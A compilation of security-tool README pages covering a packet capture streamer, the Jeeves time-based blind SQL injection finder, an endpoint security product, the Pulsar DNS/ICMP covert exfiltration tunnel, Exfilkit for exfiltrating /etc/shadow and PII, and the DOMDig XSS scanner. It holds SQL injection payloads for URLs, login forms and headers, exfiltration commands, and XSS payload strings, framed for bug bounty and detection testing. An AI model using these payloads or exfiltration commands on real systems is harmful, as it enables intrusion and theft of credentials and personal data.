Use PacketStreamer if you need a lightweight, efficient method to collect raw network data from multiple machines for central logging and analysis.

Quick Start

For full instructions, refer to the PacketStreamer Documentation.

You will need to install the golang toolchain and libpcap-dev before building PacketStreamer.

# Pre-requisites (Ubuntu): sudo apt install golang-go libpcap-dev
git clone https://github.com/deepfence/PacketStreamer.git
cd PacketStreamer/
make

Run a PacketStreamer receiver, listening on port 8081 and writing pcap output to /tmp/dump_file (see receiver.yaml):

./packetstreamer receiver --config ./contrib/config/receiver.yaml

Run one or more PacketStreamer sensors on local and remote hosts. Edit the server address in sensor.yaml:

# run on the target hosts to capture and forward traffic

# copy and edit the sample sensor-local.yaml file, and add the address of the receiver host
cp ./contrib/config/sensor-local.yaml ./contrib/config/sensor.yaml

./packetstreamer sensor --config ./contrib/config/sensor.yaml
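Once sensors are streaming, the capture can be inspected with any standard pcap tool, using the output path from the receiver example above:

tcpdump -nn -r /tmp/dump_file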

Who uses PacketStreamer?

Get in touch

Thank you for using PacketStreamer.

  • Start with the documentation
  • Got a question, need some help? Find the Deepfence team on Slack
  • Got a feature request or found a bug? Raise an issue
  • productsecurity at deepfence dot io: Found a security issue? Share it in confidence
  • Find out more at deepfence.io

Security and Support

For any security-related issues in the PacketStreamer project, contact productsecurity at deepfence dot io.

Please file GitHub issues as needed, and join the Deepfence Community Slack channel.

License

The Deepfence PacketStreamer project (this repository) is offered under the Apache2 license.

Contributions to Deepfence PacketStreamer project are similarly accepted under the Apache2 license, as per GitHub's inbound=outbound policy.



Jeeves - Time-Based Blind SQLInjection Finder


Jeeves is made for finding time-based blind SQL injection during recon.


- Installation & Requirements:

Installing Jeeves

$ go install github.com/ferreiraklet/Jeeves@latest

OR

$ git clone https://github.com/ferreiraklet/Jeeves.git
$ cd Jeeves
$ go build jeeves.go
$ chmod +x jeeves
$ ./jeeves -h

- Usage & Explanation:

In your recon process, you may find endpoints that can be vulnerable to SQL injection, e.g. https://redacted.com/index.php?id=1

Single urls

echo 'https://redacted.com/index.php?id=your_time_based_blind_payload_here' | jeeves -t payload_time
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(10)))v)" | jeeves -t 10

In --payload-time you must use the sleep time from the payload


From list

cat targets | jeeves --payload-time 5

Adding Headers

Pay attention to the syntax! It must be exactly as shown =>

echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -H "Testing: testing;OtherHeader: Value;Other2: Value"

Using proxy

echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 --proxy "http://ip:port"
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -p "http://ip:port"

Proxy + Headers =>

echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://ip:port" -H "User-Agent: xxxx"

Post Request

Sending data through post request ( login forms, etc )

Pay attention to the syntax! It must be exactly as shown ->

echo "https://example.com/Login.aspx" | jeeves -t 10 -d "user=(select(0)from(select(sleep(5)))v)&password=xxx"
echo "https://example.com/Login.aspx" | jeeves -t 10 -H "Header1: Value1" -d "username=admin&password='+(select*from(select(sleep(5)))a)+'" -p "http://yourproxy:port"

Another ways of Usage

You can use Jeeves together with other tools, such as gau, gauplus, waybackurls, qsreplace and bhedak, to get the most out of it.


Command line flags:

 Usage:
-t, --payload-time The sleep time used in the payload
-p, --proxy Send traffic to a proxy
-c Set concurrency (default 25)
-H, --headers Custom headers
-d, --data Send a POST request with data
-h Show this help message

Using with sql payloads wordlist

cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves -t 5;done

Testing in headers

echo "https://target.com" | jeeves -H "User-Agent: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10
echo "https://target.com" | jeeves -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10

Payload credit: https://github.com/rohit0x5

OBS:

  • Does not follow redirects; if the status code is different from 200, it returns "Need Manual Analisys"
  • Jeeves does not do HTTP probing; it cannot make requests to URLs that do not include a protocol (http://, https://)

This project is for educational and bug bounty purposes only! I do not support any illegal activities!

If you find any error in the program, please contact me immediately.

Please, also check these =>

Nilo - Checks if URL has status 200

SQLMAP

Blisqy Header time based SQLI



WhiteBeam - Transparent Endpoint Security


Transparent endpoint security

Features

  • Block and detect advanced attacks
  • Modern audited cryptography: RustCrypto for hashing and encryption
  • Highly compatible: Development focused on all platforms (incl. legacy) and architectures
  • Source available: Audits welcome
  • Reviewed by security researchers with a combined 100+ years of experience

In Action

Installation

From Packages (Linux)

Distro-specific packages have not been released yet for WhiteBeam, check again soon!

From Releases (Linux)

  1. Download the latest release
  2. Ensure the release file hash matches the official hashes (How-to)
  3. Install:
    • ./whitebeam-installer install

From Source (Linux)

  1. Run tests (Optional):
    • cargo run test
  2. Compile:
    • cargo run build
  3. Install WhiteBeam:
    • cargo run install

Quick start

  1. Become root (sudo su/su root)
  2. Set a recovery secret. You'll be able to use this with whitebeam --auth to make changes to the system: whitebeam --setting RecoverySecret mask
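Once the recovery secret is set, later changes to a protected system follow the same pattern (a sketch combining the commands referenced in this guide):

# authenticate with the recovery secret, then adjust a setting
whitebeam --auth
whitebeam --setting Prevention true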

How to Detect Attacks with WhiteBeam

Multiple guides are provided depending on your preference. Contact us so we can help you integrate WhiteBeam with your environment.

  1. Serverless guide, for passive review
  2. osquery Fleet setup guide, for passive review
  3. WhiteBeam Server setup guide, for active response

How to Prevent Attacks with WhiteBeam

WhiteBeam is experimental software. Contact us for assistance safely implementing it.
  1. Become root (sudo su/su root)
  2. Review the baseline at least 24 hours after installing WhiteBeam:
    • whitebeam --baseline
  3. Add trusted behavior to the whitelist, following the whitelisting guide
  4. Enable WhiteBeam prevention:
    • whitebeam --setting Prevention true


Pulsar - Data Exfiltration And Covert Communication Tool



Pulsar is a tool for data exfiltration and covert communication that enables you to create a secure data transfer, a bizarre chat or a network tunnel through different protocols; for example, you can receive data from a TCP connection and resend it to the real destination through DNS packets.


Setting up Pulsar

Make sure you have at least Go 1.8 on your system to build Pulsar.

First, get the code from the repository and compile it with the following commands:

$ cd pulsar
$ export GOPATH=$(pwd)
$ go get golang.org/x/net/icmp
$ go build -o bin/pulsar src/main.go

or run:

$ make

Connectors

A connector is a simple channel to the external world; with a connector you can read and write data from different sources.

  • Console:
    • Default in/out connector, read data from stdin and write to stdout
  • TCP
    • Read and write data through tcp connections

        tcp:127.0.0.1:9000
  • UDP
    • Read and write data through udp packets

        udp:127.0.0.1:9000
  • ICMP
    • Read and write data through icmp packets

        icmp:127.0.0.1 (the connection port is obviously useless)
  • DNS
    • Read and write data through dns packets

        dns:fakedomain.net@127.0.0.1:1994

You can use option --in in order to select input connector and option --out to select output connector:

    --in tcp:127.0.0.1:9000
--out dns:fkdns.lol@2.3.4.5:8989

Handlers


A handler allows you to change data in transit; you can combine handlers arbitrarily.

  • Stub:

    • Default, do nothing, pass through
  • Base32

    • Base32 encoder/decoder

        --handlers base32
  • Base64

    • Base64 encoder/decoder

        --handlers base64
  • Cipher

    • CTR cipher; supports AES/DES/TDES in CTR mode (Default: AES)

        --handlers cipher:<key|[aes|des|tdes#key]>

You can use the --decode option to run ALL handlers in decoding mode:

    --handlers base64,base32,base64,cipher:key --decode

Example

In the following example, Pulsar is used to create a secure two-way tunnel over the DNS protocol; data is read from a TCP connection (a simple nc client) and resent encrypted through the tunnel.

[nc 127.0.0.1 9000] <--TCP--> [pulsar] <--DNS--> [pulsar] <--TCP--> [nc -l 127.0.0.1 -p 9900]

192.168.1.198:

$ ./pulsar --in tcp:127.0.0.1:9000 --out dns:test.org@192.168.1.199:8989 --duplex --plain in --handlers 'cipher:supersekretkey!!'
$ nc 127.0.0.1 9000

192.168.1.199:

$ nc -l 127.0.0.1 -p 9900
$ ./pulsar --in dns:test.org@192.168.1.199:8989 --out tcp:127.0.0.1:9900 --duplex --plain out --handlers 'cipher:supersekretkey!!' --decode
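Before involving DNS, it can help to sanity-check a setup with a plain TCP-to-TCP relay, using only the connector syntax described above (ports are arbitrary):

$ ./pulsar --in tcp:127.0.0.1:9000 --out tcp:127.0.0.1:9900 --duplex
$ nc -l 127.0.0.1 -p 9900   # listener terminal
$ nc 127.0.0.1 9000         # client terminal; typed lines should reach the listener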

Contribute

All contributions are always welcome



Exfilkit - Data Exfiltration Utility For Testing Detection Capabilities


Data exfiltration utility for testing detection capabilities

Description

Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only.


Exfiltration How-To

/etc/shadow -> HTTP GET requests

Server

# ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.GETServer -lp 80 -o output.log

Client

$ ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.GETClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r

/etc/shadow -> HTTP POST requests

Server

# ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.POSTServer -lp 80 -o output.log

Client

$ ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.POSTClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r

PII -> PNG embedded in HTTP Response

Server

$ ./exfilkit-cli.py -m exfilkit.methods.http.image_response.Server -lp 37650 -o output.log

Client

# ./exfilkit-cli.py -m exfilkit.methods.http.image_response.Client -rh 127.0.0.1 -rp 37650 -lp 80 -i ./samples/pii.txt -r

PII -> DNS subdomains querying

Server

# ./exfilkit-cli.py -m exfilkit.methods.dns.subdomain_cipher.Server -lp 53 -o output.log

Client

$ ./exfilkit-cli.py -m exfilkit.methods.dns.subdomain_cipher.Client -rh 127.0.0.1 -rp 53 -i ./samples/pii.txt -r
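In every pairing above, the server side writes whatever it captures to the file given with -o, so while a client is running you can watch the exfiltrated data arrive:

tail -f output.log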


DOMDig - DOM XSS Scanner For Single Page Applications


DOMDig is a DOM XSS scanner that runs inside the Chromium web browser and can scan single page applications (SPAs) recursively.
Unlike other scanners, DOMDig can crawl any web application (including Gmail) by keeping track of DOM modifications and XHR/fetch/websocket requests, and it can simulate real user interaction by firing events. During this process, XSS payloads are placed into input fields and their execution is tracked in order to find injection points and the related URL modifications.
It is based on htcrawl, a node library powerful enough to easily crawl a Gmail account.


KEY FEATURES

  • Runs inside a real browser (Chromium)
  • Recursive DOM crawling engine
  • Handles XHR, fetch, JSONP and websockets requests
  • Supports cookies, proxy, custom headers, http auth and more
  • Scriptable login sequences

GETTING STARTED

Installation

git clone https://github.com/fcavallarin/domdig.git
cd domdig && npm i && cd ..
node domdig/domdig.js

Example

node domdig.js -c 'foo=bar' -p http:127.0.0.1:8080 https://htcap.org/scanme/domxss.php

Crawl Engine

DOMDig uses htcrawl as its crawling engine, the same engine used by htcap.
The diagram shows the recursive crawling process.

The video below shows the engine crawling Gmail. The crawl lasted many hours, and about 3000 XHR requests were captured.

Login Sequence

A login sequence (or initial sequence) is a JSON object containing a list of actions to take before the scan starts. Each element of the list is an array whose first element is the name of the action to take, and the remaining elements are the "parameters" to that action. Actions are:

  • write <selector> <text>
  • click <selector>
  • clickToNavigate <selector>
  • sleep <seconds>

Example
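A hypothetical sequence that fills a login form and waits for navigation (selectors and values are illustrative):

[
["write", "#username", "user@example.com"],
["write", "#password", "s3cr3t"],
["clickToNavigate", "#login-button"],
["sleep", 2]
]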

Payloads file

Payloads can be loaded from a JSON file (-P option) as an array of strings. To build custom payloads, the string window.___xssSink({0}) must be used as the function to be executed (instead of the classic alert(1)).

Example

[
"';window.___xssSink({0});",
"<img src=\"a\" onerror=\"window.___xssSink({0})\">"
]

